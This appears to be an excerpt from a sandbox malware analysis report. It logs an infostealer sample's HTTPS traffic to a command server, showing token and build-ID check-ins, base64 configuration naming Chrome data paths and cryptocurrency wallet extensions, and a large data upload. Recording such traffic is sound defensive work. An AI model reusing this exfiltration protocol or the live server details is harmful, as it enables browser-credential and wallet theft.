                                                                                    2025-03-07 19:45:22 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 72 69 77 74 6a 6d 79 63 6a 77 34 37 71 71 31 6e 37 67 76 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 39 65 36 38 32 62 61 63 62 61 32 33 33 30 32 61 39 36 39 31 65 66 61 62 66 37 32 36 33 33 0d 0a 2d 2d 2d 2d 2d 2d 72 69 77 74 6a 6d 79 63 6a 77 34 37 71 71 31 6e 37 67 76 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 31 30 61 35 34 61 31 32 38 64 35 37 31 66 33 64 64 37 62 36 33 39 30 65 61 66 63 32 62 66 38 0d 0a 2d 2d 2d 2d 2d 2d 72 69 77 74 6a 6d 79 63 6a 77 34 37 71 71 31 6e 37 67 76 73 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------riwtjmycjw47qq1n7gvsContent-Disposition: form-data; name="token"879e682bacba23302a9691efabf72633------riwtjmycjw47qq1n7gvsContent-Disposition: form-data; name="build_id"610a54a128d571f3dd7b6390eafc2bf8------riwtjmycjw47qq1n7gvsCont
                                                                                    2025-03-07 19:45:23 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Fri, 07 Mar 2025 19:45:23 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2025-03-07 19:45:23 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                    Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.44972295.217.27.2524437696C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-07 19:45:25 UTC295OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----8qieknozmozu37qqqiwl
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                    Host: go.f.goldenloafuae.com
                                                                                    Content-Length: 331
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2025-03-07 19:45:25 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 38 71 69 65 6b 6e 6f 7a 6d 6f 7a 75 33 37 71 71 71 69 77 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 39 65 36 38 32 62 61 63 62 61 32 33 33 30 32 61 39 36 39 31 65 66 61 62 66 37 32 36 33 33 0d 0a 2d 2d 2d 2d 2d 2d 38 71 69 65 6b 6e 6f 7a 6d 6f 7a 75 33 37 71 71 71 69 77 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 31 30 61 35 34 61 31 32 38 64 35 37 31 66 33 64 64 37 62 36 33 39 30 65 61 66 63 32 62 66 38 0d 0a 2d 2d 2d 2d 2d 2d 38 71 69 65 6b 6e 6f 7a 6d 6f 7a 75 33 37 71 71 71 69 77 6c 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------8qieknozmozu37qqqiwlContent-Disposition: form-data; name="token"879e682bacba23302a9691efabf72633------8qieknozmozu37qqqiwlContent-Disposition: form-data; name="build_id"610a54a128d571f3dd7b6390eafc2bf8------8qieknozmozu37qqqiwlCont
                                                                                    2025-03-07 19:45:27 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Fri, 07 Mar 2025 19:45:26 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2025-03-07 19:45:27 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                    Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.44972495.217.27.2524437696C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-07 19:45:29 UTC295OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----u3ecjek6fcj58ycbsj58
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                    Host: go.f.goldenloafuae.com
                                                                                    Content-Length: 332
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2025-03-07 19:45:29 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 75 33 65 63 6a 65 6b 36 66 63 6a 35 38 79 63 62 73 6a 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 39 65 36 38 32 62 61 63 62 61 32 33 33 30 32 61 39 36 39 31 65 66 61 62 66 37 32 36 33 33 0d 0a 2d 2d 2d 2d 2d 2d 75 33 65 63 6a 65 6b 36 66 63 6a 35 38 79 63 62 73 6a 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 31 30 61 35 34 61 31 32 38 64 35 37 31 66 33 64 64 37 62 36 33 39 30 65 61 66 63 32 62 66 38 0d 0a 2d 2d 2d 2d 2d 2d 75 33 65 63 6a 65 6b 36 66 63 6a 35 38 79 63 62 73 6a 35 38 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------u3ecjek6fcj58ycbsj58Content-Disposition: form-data; name="token"879e682bacba23302a9691efabf72633------u3ecjek6fcj58ycbsj58Content-Disposition: form-data; name="build_id"610a54a128d571f3dd7b6390eafc2bf8------u3ecjek6fcj58ycbsj58Cont
                                                                                    2025-03-07 19:45:30 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Fri, 07 Mar 2025 19:45:29 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2025-03-07 19:45:30 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.44972595.217.27.2524437696C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-07 19:45:32 UTC296OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----yusjm7yus0r1v3ekxbs0
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                    Host: go.f.goldenloafuae.com
                                                                                    Content-Length: 6005
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2025-03-07 19:45:32 UTC6005OUTData Raw: 2d 2d 2d 2d 2d 2d 79 75 73 6a 6d 37 79 75 73 30 72 31 76 33 65 6b 78 62 73 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 39 65 36 38 32 62 61 63 62 61 32 33 33 30 32 61 39 36 39 31 65 66 61 62 66 37 32 36 33 33 0d 0a 2d 2d 2d 2d 2d 2d 79 75 73 6a 6d 37 79 75 73 30 72 31 76 33 65 6b 78 62 73 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 31 30 61 35 34 61 31 32 38 64 35 37 31 66 33 64 64 37 62 36 33 39 30 65 61 66 63 32 62 66 38 0d 0a 2d 2d 2d 2d 2d 2d 79 75 73 6a 6d 37 79 75 73 30 72 31 76 33 65 6b 78 62 73 30 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------yusjm7yus0r1v3ekxbs0Content-Disposition: form-data; name="token"879e682bacba23302a9691efabf72633------yusjm7yus0r1v3ekxbs0Content-Disposition: form-data; name="build_id"610a54a128d571f3dd7b6390eafc2bf8------yusjm7yus0r1v3ekxbs0Cont
                                                                                    2025-03-07 19:45:33 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Fri, 07 Mar 2025 19:45:33 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2025-03-07 19:45:33 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 2ok0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.44972695.217.27.2524437696C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-07 19:45:33 UTC295OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----ieuknglfcbimyusrqi5f
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                    Host: go.f.goldenloafuae.com
                                                                                    Content-Length: 489
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2025-03-07 19:45:33 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 69 65 75 6b 6e 67 6c 66 63 62 69 6d 79 75 73 72 71 69 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 39 65 36 38 32 62 61 63 62 61 32 33 33 30 32 61 39 36 39 31 65 66 61 62 66 37 32 36 33 33 0d 0a 2d 2d 2d 2d 2d 2d 69 65 75 6b 6e 67 6c 66 63 62 69 6d 79 75 73 72 71 69 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 31 30 61 35 34 61 31 32 38 64 35 37 31 66 33 64 64 37 62 36 33 39 30 65 61 66 63 32 62 66 38 0d 0a 2d 2d 2d 2d 2d 2d 69 65 75 6b 6e 67 6c 66 63 62 69 6d 79 75 73 72 71 69 35 66 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------ieuknglfcbimyusrqi5fContent-Disposition: form-data; name="token"879e682bacba23302a9691efabf72633------ieuknglfcbimyusrqi5fContent-Disposition: form-data; name="build_id"610a54a128d571f3dd7b6390eafc2bf8------ieuknglfcbimyusrqi5fCont
                                                                                    2025-03-07 19:45:34 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Fri, 07 Mar 2025 19:45:34 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2025-03-07 19:45:34 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 2ok0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    8192.168.2.44972795.217.27.2524437696C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-07 19:45:35 UTC298OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----ozcb1d2nop8qiekfkfk6
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                    Host: go.f.goldenloafuae.com
                                                                                    Content-Length: 262605
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2025-03-07 19:45:35 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 6f 7a 63 62 31 64 32 6e 6f 70 38 71 69 65 6b 66 6b 66 6b 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 39 65 36 38 32 62 61 63 62 61 32 33 33 30 32 61 39 36 39 31 65 66 61 62 66 37 32 36 33 33 0d 0a 2d 2d 2d 2d 2d 2d 6f 7a 63 62 31 64 32 6e 6f 70 38 71 69 65 6b 66 6b 66 6b 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 31 30 61 35 34 61 31 32 38 64 35 37 31 66 33 64 64 37 62 36 33 39 30 65 61 66 63 32 62 66 38 0d 0a 2d 2d 2d 2d 2d 2d 6f 7a 63 62 31 64 32 6e 6f 70 38 71 69 65 6b 66 6b 66 6b 36 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------ozcb1d2nop8qiekfkfk6Content-Disposition: form-data; name="token"879e682bacba23302a9691efabf72633------ozcb1d2nop8qiekfkfk6Content-Disposition: form-data; name="build_id"610a54a128d571f3dd7b6390eafc2bf8------ozcb1d2nop8qiekfkfk6Cont
                                                                                    2025-03-07 19:45:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
